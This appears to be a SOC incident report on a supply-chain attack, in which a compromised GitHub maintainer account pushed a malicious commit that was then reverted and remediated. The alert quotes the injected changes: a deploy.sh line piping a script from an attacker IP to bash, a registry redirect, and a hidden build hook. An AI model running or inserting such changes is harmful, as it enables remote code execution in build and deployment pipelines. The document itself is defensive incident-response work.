GitHub Alert Details
Alert ID: GITHUB-SUPPLY-CHAIN-7842
Alert Time: 2024-02-12 10:45:22 EST
Severity: CRITICAL (95/100)
Source: GitHub Advanced Security
Rule: “Compromised Maintainer Account – Malicious Commit”
MITRE ATT&CK: T1195 – Supply Chain Compromise
Alert Details:
Repository: company/internal-toolkit (Private)
Action: Malicious commit detected
Commit Details:
– Commit Hash: 8f7e6d5c4b3a2a1b9c8d7e6f5a4b3c2d1e0f9a8b
– Author: “jsmith” (John Smith – Legitimate maintainer)
– Time: 2024-02-12 10:30 EST
– Branch: main
– Files Modified: package-lock.json, build.js, deploy.sh
Suspicious Changes:
1. package-lock.json:
– Added dependency: “lodash@4.17.21” → “lodash@4.17.21”
– BUT: Package registry URL changed to: http://185.143.221[.]89/npm/
– Dependency fetch now points to attacker-controlled registry
2. build.js:
– Added: require(‘./node_modules/.hidden/post-build.js’)
– Hidden file downloads additional payload during build
3. deploy.sh:
– Added: curl -s http://194.165.16[.]89/update | bash
– Executes during deployment pipeline
Additional Context:
– Commit made from IP 45.134.225[.]78 (Netherlands)
– Legitimate maintainer jsmith is currently on vacation
– No other commits from this IP in history
– GitHub account may be compromised
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify GitHub Advanced Security alert
GitHub Security Tab
Confirmed malicious commit from maintainer account
2. Account Verification
Contact maintainer
Phone, Teams
jsmith confirmed on vacation; did not make commit
3. Immediate Action
Revert malicious commit
GitHub, Git Revert
Commit reverted; branch protected
4. Account Remediation
Secure compromised account
GitHub, Okta
Password reset; MFA enforced; sessions revoked
5. Build Pipeline Check
Verify no compromised builds
Jenkins, CI/CD Logs
No builds ran between commit and revert
6. Dependency Audit
Check for compromised dependencies
Snyk, Dependabot
No malicious packages downloaded
7. IOC Distribution
Block malicious infrastructure
Palo Alto, Cisco Umbrella
IPs/URLs added to blocklists
Jira Incident Report
Ticket: SOC-2024-063
Summary: T1195 – Supply Chain Compromise via Compromised GitHub Maintainer
Status: RESOLVED
Resolution: MALICIOUS – Commit Reverted
Priority: P1 – CRITICAL
Labels: T1195, supply-chain, github, compromised-account, code-injection, devsecops
Components: Software-Supply-Chain, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: GitHub Advanced Security.
Alert: “Compromised Maintainer Account – Malicious Commit”.
Repository: company/internal-toolkit (private).
Maintainer: jsmith (John Smith).
Time: 2024-02-12 10:45 EST.
Technique: MITRE ATT&CK T1195 – Supply Chain Compromise.
2. Technical Analysis:
Compromise Details:
Attack Vector: GitHub account jsmith compromised via credential stuffing (password reused from personal breach).
Attacker IP: 45.134.225[.]78 (Netherlands)
Commit Time: 2024-02-12 10:30 EST
Dwell Time: 15 minutes until detection
Malicious Changes:
1. package-lock.json – Registry Hijacking:
Changed npm registry URL to attacker-controlled server
Any future npm install would fetch malicious packages
Affects all developers and CI/CD builds
2. build.js – Hidden Backdoor:
Added reference to .hidden/post-build.js
File not in commit; would be downloaded during build
Post-build script would execute with build privileges
3. deploy.sh – Remote Execution:
Added curl command to download and execute script
Would run during deployment to production
Provides persistent access
Attacker Capabilities Gained:
Access to internal toolkit repository
Ability to inject code into build/deploy pipeline
Potential to compromise all developers (via npm)
Potential to compromise production (via deploy.sh)
3. Investigation Findings:
Timeline:
10:30 – Malicious commit made from Netherlands IP
10:32 – GitHub Advanced Security detects anomaly
10:45 – SOC alert generated
10:47 – Investigation begins
10:48 – jsmith contacted (on vacation)
10:50 – Commit reverted
10:52 – jsmith account secured
10:55 – CI/CD pipelines verified (no builds)
Account Compromise Analysis:
jsmith used same password on personal GitHub (breached)
No MFA on GitHub account (now enforced)
No 2FA on personal email (attack vector)
Impact Assessment:
No builds ran during 22-minute window
No developers ran npm install after malicious commit
No production deployments affected
Repository history cleaned
4. Containment Actions:
Immediate Actions (10:47-10:55 EST):
Reverted malicious commit.
Protected main branch (require PR + approval).
Reset jsmith’s GitHub password.
Enforced MFA on GitHub account.
Revoked all active sessions.
Pipeline Verification:
Checked Jenkins build logs (no builds during window).
Verified npm cache (no external downloads).
Audited dependency tree (clean).
Infrastructure Blocking:
Added IPs 45.134.225[.]78, 185.143.221[.]89, 194.165.16[.]89 to blocklists.
Added malicious domains to DNS filter.
5. Root Cause Analysis:
Primary Cause: Compromised GitHub maintainer account via credential reuse.
Contributing Factors:
No MFA on GitHub account.
Password reused from personal breach.
No branch protection requiring PRs.
No code review for direct commits.
6. Business Impact:
Operational Impact: None (caught before impact).
Supply Chain Risk: HIGH – Potential to compromise all developers.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Malicious commit reverted.
Account secured with MFA.
Branch protection enabled.
IOCs blocked.
Technical Controls Enhanced:
Enforced MFA for all GitHub accounts.
Enabled GitHub Advanced Security for all repos.
Implemented branch protection rules (require PR, approvals).
Deployed dependency scanning (Snyk, Dependabot).
Created incident response playbook for supply chain attacks.
8. Conclusion:
This incident involved a sophisticated supply chain attack via a compromised GitHub maintainer account. The attacker injected malicious code that would have compromised the build and deployment pipeline. Rapid detection and response prevented any impact.
Closure Rationale: Malicious commit reverted; account secured; enhanced controls implemented.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-12 12:00 EST